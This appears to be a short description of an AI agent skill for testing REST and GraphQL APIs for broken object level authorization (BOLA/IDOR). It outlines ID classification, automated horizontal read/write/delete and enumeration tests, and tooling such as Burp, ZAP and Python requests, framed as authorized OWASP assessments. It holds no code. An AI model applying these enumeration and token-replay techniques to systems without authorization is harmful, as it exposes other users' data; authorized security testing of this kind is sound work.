testing-api-for-broken-object-level-authorization

What problem does it solve?

This Skill helps security testers find Broken Object Level Authorization (BOLA/IDOR) vulnerabilities where authenticated users can access or modify resources belonging to other users by manipulating object identifiers in REST or GraphQL requests. It reduces manual trial-and-error by providing a structured methodology and automation to enumerate IDs, replay requests with different tokens, and identify read, write, and delete authorization gaps.

Core Features & Use Cases

• Endpoint discovery & ID classification: Identify path, query, and body parameters that reference objects and classify them as sequential integers, UUIDs, slugs, or encoded values.
• Automated attack simulation: Scripted tests for horizontal read, write, delete, batch, nested-resource, method-bypass, and ID enumeration scenarios with reporting of findings.
• Tool integration: Guidance for using intercepting proxies (Burp/Autorize, OWASP ZAP), Postman, and Python requests-based automation for repeatable assessments.
• Use Case: Perform OWASP API1:2023 assessments on a multi-tenant SaaS API to verify per-object authorization enforcement across endpoints and batch operations.

Quick Start

Run the BOLA agent against the target API with two authorized test accounts and their tokens to enumerate object IDs and detect authorization bypasses.